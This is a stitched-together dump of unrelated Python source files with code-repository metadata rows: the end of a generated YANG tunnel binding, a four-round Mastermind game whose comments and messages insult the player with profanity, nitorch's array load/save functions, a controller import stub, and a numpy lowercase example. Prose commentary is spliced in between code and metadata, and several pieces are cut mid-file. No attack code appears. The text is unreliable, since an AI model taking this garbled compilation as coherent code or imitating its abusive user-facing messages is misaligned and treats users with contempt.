setup_priority = __builtin__.property(_get_setup_priority, _set_setup_priority)
hold_priority = __builtin__.property(_get_hold_priority, _set_hold_priority)
_pyangbind_elements = OrderedDict(
[
("name", name),
("type", type),
("signaling_protocol", signaling_protocol),
("description", description),
("admin_status", admin_status),
("preference", preference),
("metric_type", metric_type),
("metric", metric),
("shortcut_eligible", shortcut_eligible),
("protection_style_requested", protection_style_requested),
("reoptimize_timer", reoptimize_timer),
("source", source),
("soft_preemption", soft_preemption),
("setup_priority", setup_priority),
("hold_priority", hold_priority),
]
)
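The generated setters above all follow the same pattern: wrap the incoming value in a `YANGDynClass` whose base type enforces the leaf's YANG range, and convert any `TypeError`/`ValueError` into a descriptive `ValueError`. A minimal, self-contained sketch of that range check — `make_restricted_int` is a hypothetical stand-in, not pyangbind's actual `RestrictedClassType`:

```python
# Simplified stand-in for the range-validation pattern used by the
# generated setters: an int subclass that rejects out-of-range values.

def make_restricted_int(lo, hi):
    """Build an int subclass that rejects values outside [lo, hi]."""
    class RestrictedInt(int):
        def __new__(cls, value):
            value = int(value)
            if not lo <= value <= hi:
                raise ValueError(f"{value} outside range {lo}..{hi}")
            return super().__new__(cls, value)
    return RestrictedInt

Int32 = make_restricted_int(-2147483648, 2147483647)   # as for the 'metric' leaf
Uint16 = make_restricted_int(0, 65535)                 # as for the 'reoptimize-timer' leaf

print(Int32(-5))          # accepted: within the int32 range
try:
    Uint16(70000)         # rejected: outside 0..65535
except ValueError as err:
    print("rejected:", err)
```

A caller that assigns `tunnel.config.metric = 70000` on bindings like these would hit the same check, which is why each setter re-raises with the "must be of a type compatible with ..." message shown above.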
6b6df4aced418ca001e310d28f38c6f51d7e61b4 | 6,376 | py | Python | 04_Fucking_Mastermind_By_DaengGuitar_PlusScore.py | HelloYeew/kurohato-vs-python | b68d96be881b35b6893c30b6f73b2c41162c199b | ["MIT"]
# Prog-04-Fuck: Fucking Mastermind Game Savage Version
# I, teacher Daeng Guitar, am going to teach you on this damn Valentine's Day. Name: I have two screens, double screens.
import random
import math
# Why the hell import math when it's never used?
# Uppercase variables as enum-style constants, eh, fair enough
WINNING_MSG = "Congratulations! You won the game."
LOSING_MSG = "Sorry! You just lost it."
code = ''.join(random.sample('ABCDEF', 4))
print('Please guess the puzzle code using')
print('the four distinct code characters from [A to F]:')
# What the hell did you write this dash for?
# Used to check the answer when testing the program
# print(f"Answer : {code}")
code_split = list(code)
# --round 1--
# Same color and same position
p = 0
# Same color but not same position
v = 0
# Not fucking same! Where do you get this from?
x = 0
answer = input(f"Turn #1 : ")
# This list was meant to mark already-matched positions so each is checked only once (it is never actually used).
check_status = [' ', ' ', ' ', ' ']
# Support players who don't type capital letters when playing this fucking game.
answer = answer.upper()
answer_split = list(answer)
if len(answer) > 4:
print(f"{' ' * 10}Think you're so cool writing more than 4 characters, you bastard?")
elif len(answer) < 4:
print(f"{' ' * 10}Hey you, this game asks for 4 characters and you typed {len(answer)}. Think that's cool? You're going to hell for that.")
elif answer == code:
# Import library here? No rule about library in your sheet LMAO.
import sys
print(WINNING_MSG)
sys.exit()
else:
if answer_split[0] == code_split[0]:
p += 1
elif answer_split[0] in code_split:
v += 1
else:
x += 1
if answer_split[1] == code_split[1]:
p += 1
elif answer_split[1] in code_split:
v += 1
else:
x += 1
if answer_split[2] == code_split[2]:
p += 1
elif answer_split[2] in code_split:
v += 1
else:
x += 1
if answer_split[3] == code_split[3]:
p += 1
elif answer_split[3] in code_split:
v += 1
else:
x += 1
print(f"{' '*10}P={p},V={v},X={x}")
# --round 2--
# Same color and same position
p = 0
# Same color but not same position
v = 0
# Not fucking same! Where do you get this from?
x = 0
answer = input(f"Turn #2 : ")
# This list was meant to mark already-matched positions so each is checked only once (it is never actually used).
check_status = [' ', ' ', ' ', ' ']
# Support players who don't type capital letters when playing this fucking game.
answer = answer.upper()
answer_split = list(answer)
if len(answer) > 4:
print(f"{' ' * 10}Think you're so cool writing more than 4 characters, you bastard?")
elif len(answer) < 4:
print(f"{' ' * 10}Hey you, this game asks for 4 characters and you typed {len(answer)}. Think that's cool? You're going to hell for that.")
elif answer == code:
# Import library here? No rule about library in your sheet LMAO.
import sys
print(WINNING_MSG)
sys.exit()
else:
if answer_split[0] == code_split[0]:
p += 1
elif answer_split[0] in code_split:
v += 1
else:
x += 1
if answer_split[1] == code_split[1]:
p += 1
elif answer_split[1] in code_split:
v += 1
else:
x += 1
if answer_split[2] == code_split[2]:
p += 1
elif answer_split[2] in code_split:
v += 1
else:
x += 1
if answer_split[3] == code_split[3]:
p += 1
elif answer_split[3] in code_split:
v += 1
else:
x += 1
print(f"{' '*10}P={p},V={v},X={x}")
# --round 3--
# Same color and same position
p = 0
# Same color but not same position
v = 0
# Not fucking same! Where do you get this from?
x = 0
answer = input(f"Turn #3 : ")
# This list was meant to mark already-matched positions so each is checked only once (it is never actually used).
check_status = [' ', ' ', ' ', ' ']
# Support players who don't type capital letters when playing this fucking game.
answer = answer.upper()
answer_split = list(answer)
if len(answer) > 4:
print(f"{' ' * 10}Think you're so cool writing more than 4 characters, you bastard?")
elif len(answer) < 4:
print(f"{' ' * 10}Hey you, this game asks for 4 characters and you typed {len(answer)}. Think that's cool? You're going to hell for that.")
elif answer == code:
# Import library here? No rule about library in your sheet LMAO.
import sys
print(WINNING_MSG)
sys.exit()
else:
if answer_split[0] == code_split[0]:
p += 1
elif answer_split[0] in code_split:
v += 1
else:
x += 1
if answer_split[1] == code_split[1]:
p += 1
elif answer_split[1] in code_split:
v += 1
else:
x += 1
if answer_split[2] == code_split[2]:
p += 1
elif answer_split[2] in code_split:
v += 1
else:
x += 1
if answer_split[3] == code_split[3]:
p += 1
elif answer_split[3] in code_split:
v += 1
else:
x += 1
print(f"{' '*10}P={p},V={v},X={x}")
# --round 4--
# Same color and same position
p = 0
# Same color but not same position
v = 0
# Not fucking same! Where do you get this from?
x = 0
answer = input(f"Turn #4 : ")
# This list was meant to mark already-matched positions so each is checked only once (it is never actually used).
check_status = [' ', ' ', ' ', ' ']
# Support players who don't type capital letters when playing this fucking game.
answer = answer.upper()
answer_split = list(answer)
if len(answer) > 4:
print(f"{' ' * 10}Think you're so cool writing more than 4 characters, you bastard?")
elif len(answer) < 4:
print(f"{' ' * 10}Hey you, this game asks for 4 characters and you typed {len(answer)}. Think that's cool? You're going to hell for that.")
elif answer == code:
# Importing a module mid-script is unusual, but nothing in the assignment forbids it.
import sys
print("Congratulations! You won the game.")
sys.exit()
else:
if answer_split[0] == code_split[0]:
p += 1
elif answer_split[0] in code_split:
v += 1
else:
x += 1
if answer_split[1] == code_split[1]:
p += 1
elif answer_split[1] in code_split:
v += 1
else:
x += 1
if answer_split[2] == code_split[2]:
p += 1
elif answer_split[2] in code_split:
v += 1
else:
x += 1
if answer_split[3] == code_split[3]:
p += 1
elif answer_split[3] in code_split:
v += 1
else:
x += 1
print(f"{' '*10}P={p},V={v},X={x}")
print("Sorry! You lost the game.")
print(f"The answer is {code}")
print("Please try again...")
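The four per-position checks above are pasted verbatim into every round. Under the same P/V/X scoring rules, a loop-based sketch (with a hypothetical helper name `score_guess`) could replace each copy:

```python
def score_guess(answer, code):
    """Score one guess with the same P/V/X rules as the round-by-round code."""
    p = v = x = 0
    for guess_ch, code_ch in zip(answer, code):
        if guess_ch == code_ch:
            p += 1  # right color, right position
        elif guess_ch in code:
            v += 1  # right color, wrong position
        else:
            x += 1  # color not in the code at all
    return p, v, x

print(score_guess("RBGY", "RGBY"))  # -> (2, 2, 0)
```

Wrapping the four turns in a `for turn in range(1, 5):` loop around this helper would shrink the game to a fraction of its current length without changing its behaviour.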
| 28.591928 | 113 | 0.596769 | 1,183 | 6,376 | 3.267118 | 0.146238 | 0.102458 | 0.053816 | 0.049677 | 0.873221 | 0.856662 | 0.856662 | 0.856662 | 0.856662 | 0.856662 | 0 | 0.03277 | 0.258156 | 6,376 | 222 | 114 | 28.720721 | 0.755814 | 0.278388 | 0 | 0.914286 | 0 | 0.022857 | 0.234392 | 0.050821 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.034286 | 0 | 0.034286 | 0.12 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6bfe22818e6a4684769aaaff60381f75f89aa9d6 | 12,070 | py | Python | nitorch/io/loadsave.py | wyli/nitorch | 3ecd18944cf45fb9193c4c6ffc32953c4d1c71ac | [
"MIT"
] | 1 | 2021-04-09T21:24:47.000Z | 2021-04-09T21:24:47.000Z | nitorch/io/loadsave.py | wyli/nitorch | 3ecd18944cf45fb9193c4c6ffc32953c4d1c71ac | [
"MIT"
] | null | null | null | nitorch/io/loadsave.py | wyli/nitorch | 3ecd18944cf45fb9193c4c6ffc32953c4d1c71ac | [
"MIT"
] | null | null | null | """Functional API to load and save arrays."""
import os
from .mapping import MappedArray
from .readers import reader_classes
from .writers import writer_classes
_DEBUG = False
def _trace(*args, **kwargs):
if _DEBUG:
print(*args, **kwargs)
def map(file_like, permission='r+', keep_open=True):
"""Map a data file
Parameters
----------
file_like : str or file object
Input file
permission : {'r', 'r+'}, default='r+'
File permission: 'r' means read-only while 'r+' means read and
write. 'r+' is necessary for partial writing into the file.
keep_open : bool, default=True
Keep file open. Can be more efficient if multiple reads (or
writes) are expected.
Returns
-------
dat : MappedArray
A `MappedArray` instance. Data can then be loaded in memory
by calling `dat.data()` or `dat.fdata()`.
"""
remaining_classes = []
if isinstance(file_like, MappedArray):
# nothing to do
return file_like
if isinstance(file_like, (str, os.PathLike)):
# first guess based on file extension
base, ext = os.path.splitext(file_like)
if ext.lower() == '.gz':
base, ext = os.path.splitext(base)
for klass in reader_classes:
if ext.lower() in klass.possible_extensions():
try:
_trace('try', klass.__name__, end=' ')
out = klass(file_like, permission, keep_open)
_trace('-> success')
return out
except klass.FailedReadError:
_trace('-> failed')
pass
else:
remaining_classes.append(klass)
# second guess
for klass in remaining_classes:
try:
_trace('try', klass.__name__, end=' ')
out = klass(file_like, permission, keep_open)
_trace('-> success')
return out
except klass.FailedReadError:
_trace('-> failed')
pass
raise ValueError('Could not read {}'.format(file_like))
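The double `splitext` above is what lets `map` see through a `.gz` wrapper when guessing the reader class. Isolated as a small self-contained sketch (hypothetical helper name `split_ext_gz`):

```python
import os

def split_ext_gz(path):
    # Mirror map()'s extension guess: strip a trailing .gz first,
    # then take the next extension as the "real" one.
    base, ext = os.path.splitext(path)
    if ext.lower() == '.gz':
        base, ext = os.path.splitext(base)
    return base, ext

print(split_ext_gz('brain.nii.gz'))  # -> ('brain', '.nii')
print(split_ext_gz('img.mgz'))      # -> ('img', '.mgz')
```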
def load(file_like, *args, attributes=None, **kwargs):
"""Read a data file and load it in memory.
Parameters
----------
file_like : str or file object
Path to file or file object (with methods `seek`, `read`)
dtype : type or torch.dtype or np.dtype, optional
Output data type. By default, keep the on-disk data type.
device : torch.device, default='cpu'
Output device.
rand : bool, default=False
If the on-disk dtype is not floating point, sample noise
in the uncertainty interval.
cutoff : float or (float, float), default=(0, 1)
Percentile cutoff. If only one value is provided, it is
assumed to relate to the upper percentile.
dim : int or list[int], optional
Dimensions along which to compute percentiles.
By default, they are computed on the flattened array.
casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe', 'rescale'}, default='unsafe'
Controls what kind of data casting may occur:
* 'no': the data types should not be cast at all.
* 'equiv': only byte-order changes are allowed.
* 'safe': only casts which can preserve values are allowed.
* 'same_kind': only safe casts or casts within a kind,
like float64 to float32, are allowed.
* 'unsafe': any data conversions may be done.
* 'rescale': the input data is rescaled to match the dynamic
range of the output type. The minimum value in the data
is mapped to the minimum value of the data type and the
maximum value in the data is mapped to the maximum value
of the data type.
* 'rescale_zero': the input data is rescaled to match the
dynamic range of the output type, but ensuring that
zero maps to zero.
> If the data is signed and cast to a signed datatype,
zero maps to zero, and the scaling is chosen so that
both the maximum and minimum value in the data fit
in the output dynamic range.
> If the data is signed and cast to an unsigned datatype,
negative values "wrap around" (as with an unsafe cast).
> If the data is unsigned and cast to a signed datatype,
values are kept positive (the negative range is unused).
numpy : bool, default=False
Return a numpy array rather than a torch tensor.
attributes : list[str]
List of attributes to return as well.
See `MappedArray` for the possible attributes.
Returns
-------
dat : array or tensor
The array loaded in memory
attributes : dict, if attributes is not None
Dictionary of attributes loaded as well
"""
file = map(file_like, permission='r', keep_open=False)
dat = file.data(*args, **kwargs)
if attributes:
attributes = {key: getattr(file, key) for key in attributes}
return dat, attributes
else:
return dat
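`load` is documented to return a *dictionary* of attributes, so the collection step must be a dict comprehension over `getattr`, not a set. Shown here on a stand-in object, since a real `MappedArray` needs a file on disk:

```python
class DummyArray:
    """Stand-in for a MappedArray exposing a couple of attributes."""
    shape = (4, 4)
    dtype = 'float32'

requested = ('shape', 'dtype')
attributes = {key: getattr(DummyArray, key) for key in requested}
print(attributes)  # -> {'shape': (4, 4), 'dtype': 'float32'}
```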
def loadf(file_like, *args, attributes=None, **kwargs):
"""Read a data file and load it -- scaled -- in memory.
This function differs from `read` in several ways:
* The output data type should be a floating point type.
* If an affine scaling (slope, intercept) is defined in the
file, it is applied to the data.
* the default output data type is `torch.get_default_dtype()`.
Parameters
----------
file_like : str or file object
Path to file or file object (with methods `seek`, `read`)
dtype : dtype_like, optional
Output data type. By default, use `torch.get_default_dtype()`.
Should be a floating point type.
device : torch.device, default='cpu'
Output device.
rand : bool, default=False
If the on-disk dtype is not floating point, sample noise
in the uncertainty interval.
cutoff : float or (float, float), default=(0, 1)
Percentile cutoff. If only one value is provided, it is
assumed to relate to the upper percentile.
dim : int or list[int], optional
Dimensions along which to compute percentiles.
By default, they are computed on the flattened array.
numpy : bool, default=False
Return a numpy array rather than a torch tensor.
attributes : list[str]
List of attributes to return as well.
See `MappedArray` for the possible attributes.
Returns
-------
dat : array or tensor
The array loaded in memory
attributes : dict, if attributes is not None
Dictionary of attributes loaded as well
"""
file = map(file_like, permission='r', keep_open=False)
dat = file.fdata(*args, **kwargs)
if attributes:
attributes = {key: getattr(file, key) for key in attributes}
return dat, attributes
else:
return dat
def save(dat, file_like, like=None, casting='unsafe', **metadata):
"""Write an array to disk.
This function makes educated choices for the file format and
its metadata based on the file extension, the data type and the
other options provided.
Parameters
----------
dat : tensor or array or MappedArray
Data to write
file_like : str or file object
Path to file or file object (with methods `seek`, `read`).
If the extension is known, it gets priority over `like` when
choosing the output format.
like : file or MappedArray
An array on-disk that should be used as a template for the new
file. Its metadata/layout/etc will be mimicked as much as possible.
casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe', 'rescale'}, default='unsafe'
Controls what kind of data casting may occur.
See `MappedArray.set_data`
metadata : dict
Metadata to store on disk. Values provided there will have
priority over `like`.
Returns
-------
dat : MappedArray
The array as written on disk
"""
if like is not None and not isinstance(like, MappedArray):
like = map(like)
remaining_classes = []
if isinstance(file_like, (str, os.PathLike)):
# first guess based on file extension
base, ext = os.path.splitext(file_like)
if ext.lower() == '.gz':
base, ext = os.path.splitext(base)
for klass in writer_classes:
if ext.lower() in klass.possible_extensions():
try:
return klass.save_new(dat, file_like, like, casting, **metadata)
except klass.FailedWriteError:
pass
else:
remaining_classes.append(klass)
# second guess based on `like` object
if like is not None and type(like) in remaining_classes:
klass = type(like)
try:
return klass.save_new(dat, file_like, like, casting, **metadata)
except klass.FailedWriteError:
remaining_classes = [k for k in remaining_classes
if k is not klass]
# third guess: try everything that's left
for klass in remaining_classes:
try:
return klass.save_new(dat, file_like, like, casting, **metadata)
except klass.FailedWriteError:
pass
# failed
raise ValueError('Could not write {}'.format(file_like))
def savef(dat, file_like, like=None, **metadata):
"""Write a scaled array to disk.
This function makes educated choices for the file format and
its metadata based on the file extension, the data type and the
other options provided.
The input data type must be a floating point type.
Parameters
----------
dat : tensor or array or MappedArray
Data to write
file_like : str or file object
Path to file or file object (with methods `seek`, `read`).
If the extension is known, it gets priority over `like` when
choosing the output format.
like : file or MappedArray
An array on-disk that should be used as a template for the new
file. Its metadata/layout/etc will be mimicked as much as possible.
metadata : dict
Metadata to store on disk. Values provided there will have
priority over `like`.
Returns
-------
dat : MappedArray
The array as written on disk
"""
if like is not None and not isinstance(like, MappedArray):
like = map(like)
remaining_classes = []
if isinstance(file_like, (str, os.PathLike)):
# first guess based on file extension
base, ext = os.path.splitext(file_like)
if ext.lower() == '.gz':
base, ext = os.path.splitext(base)
for klass in writer_classes:
if ext.lower() in klass.possible_extensions():
try:
return klass.savef_new(dat, file_like, like, **metadata)
except klass.FailedWriteError:
pass
else:
remaining_classes.append(klass)
# second guess based on `like` object
if like is not None and type(like) in remaining_classes:
klass = type(like)
try:
return klass.savef_new(dat, file_like, like, **metadata)
except klass.FailedWriteError:
remaining_classes = [k for k in remaining_classes
if k is not klass]
# third guess: try everything that's left
for klass in remaining_classes:
try:
return klass.savef_new(dat, file_like, like, **metadata)
except klass.FailedWriteError:
pass
# failed
raise ValueError('Could not write {}'.format(file_like))
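`save` and `savef` share a multi-stage dispatch: writers matching the file extension are tried first, then (in `save`) the class of the `like` template, then everything that is left. A stripped-down, self-contained sketch of that cascade, with hypothetical writer classes and without the `like` stage:

```python
import os

class FailedWriteError(Exception):
    """Stand-in for each writer class's failure exception."""

class TxtWriter:
    extensions = ('.txt',)
    @classmethod
    def save_new(cls, dat, path):
        return f'txt:{dat}'

class BinWriter:
    extensions = ('.bin',)
    @classmethod
    def save_new(cls, dat, path):
        return f'bin:{dat}'

def save(dat, path, writers=(TxtWriter, BinWriter)):
    remaining = []
    _, ext = os.path.splitext(path)
    # first guess: writers that claim this extension
    for klass in writers:
        if ext in klass.extensions:
            try:
                return klass.save_new(dat, path)
            except FailedWriteError:
                pass
        else:
            remaining.append(klass)
    # last resort: try everything that's left
    for klass in remaining:
        try:
            return klass.save_new(dat, path)
        except FailedWriteError:
            pass
    raise ValueError(f'Could not write {path}')

print(save('x', 'out.txt'))  # -> txt:x
print(save('x', 'out.bin'))  # -> bin:x
```

Catching a per-class `FailedWriteError` (rather than a bare `except`) is what lets the cascade fall through to the next candidate without swallowing unrelated bugs.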
| 36.137725 | 89 | 0.612428 | 1,565 | 12,070 | 4.663898 | 0.173163 | 0.033977 | 0.014797 | 0.016441 | 0.799151 | 0.781614 | 0.752706 | 0.744075 | 0.723798 | 0.718044 | 0 | 0.000958 | 0.307871 | 12,070 | 333 | 90 | 36.246246 | 0.872756 | 0.562469 | 0 | 0.830357 | 0 | 0 | 0.025619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053571 | false | 0.053571 | 0.035714 | 0 | 0.205357 | 0.008929 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
d4221e7b2849acba97c903c964834f1303609462 | 152 | py | Python | src/Python.MicroWebSrv/Python.MicroWebSrv.Vue.Vuetify1/ServerApp/Controllers/__init__.py | grbd/GBD.NetCore.WebTemplates | 19dee03ecc98279c10999fe6c32c61e17357d4c9 | [
"MIT"
] | null | null | null | src/Python.MicroWebSrv/Python.MicroWebSrv.Vue.Vuetify1/ServerApp/Controllers/__init__.py | grbd/GBD.NetCore.WebTemplates | 19dee03ecc98279c10999fe6c32c61e17357d4c9 | [
"MIT"
] | null | null | null | src/Python.MicroWebSrv/Python.MicroWebSrv.Vue.Vuetify1/ServerApp/Controllers/__init__.py | grbd/GBD.NetCore.WebTemplates | 19dee03ecc98279c10999fe6c32c61e17357d4c9 | [
"MIT"
] | null | null | null |
import ServerApp.Controllers.HomeController
#import ServerApp.Controllers.SampleDataController
# TODO
#import ServerApp.Controllers.WeatherController
| 21.714286 | 50 | 0.875 | 13 | 152 | 10.230769 | 0.538462 | 0.338346 | 0.586466 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065789 | 152 | 6 | 51 | 25.333333 | 0.93662 | 0.657895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
d43d8cd9f8be36f8a975b030b0514c3425cbc66b | 169 | py | Python | numpy/stringOperations/numpyFunctionLower.py | slowy07/pythonApps | 22f9766291dbccd8185035745950c5ee4ebd6a3e | [
"MIT"
] | 10 | 2020-10-09T11:05:18.000Z | 2022-02-13T03:22:10.000Z | numpy/stringOperations/numpyFunctionLower.py | khairanabila/pythonApps | f90b8823f939b98f7bf1dea7ed35fe6e22e2f730 | [
"MIT"
] | null | null | null | numpy/stringOperations/numpyFunctionLower.py | khairanabila/pythonApps | f90b8823f939b98f7bf1dea7ed35fe6e22e2f730 | [
"MIT"
] | 6 | 2020-11-26T12:49:43.000Z | 2022-03-06T06:46:43.000Z | # numpy.lower() function
import numpy as np
# converting to lowercase
print(np.char.lower(['ARFY', 'JOLE']))
# converting to lowercase
print(np.char.lower('JOLE')) | 18.777778 | 38 | 0.704142 | 24 | 169 | 4.958333 | 0.541667 | 0.201681 | 0.352941 | 0.436975 | 0.621849 | 0.621849 | 0.621849 | 0 | 0 | 0 | 0 | 0 | 0.136095 | 169 | 9 | 39 | 18.777778 | 0.815068 | 0.414201 | 0 | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 8 |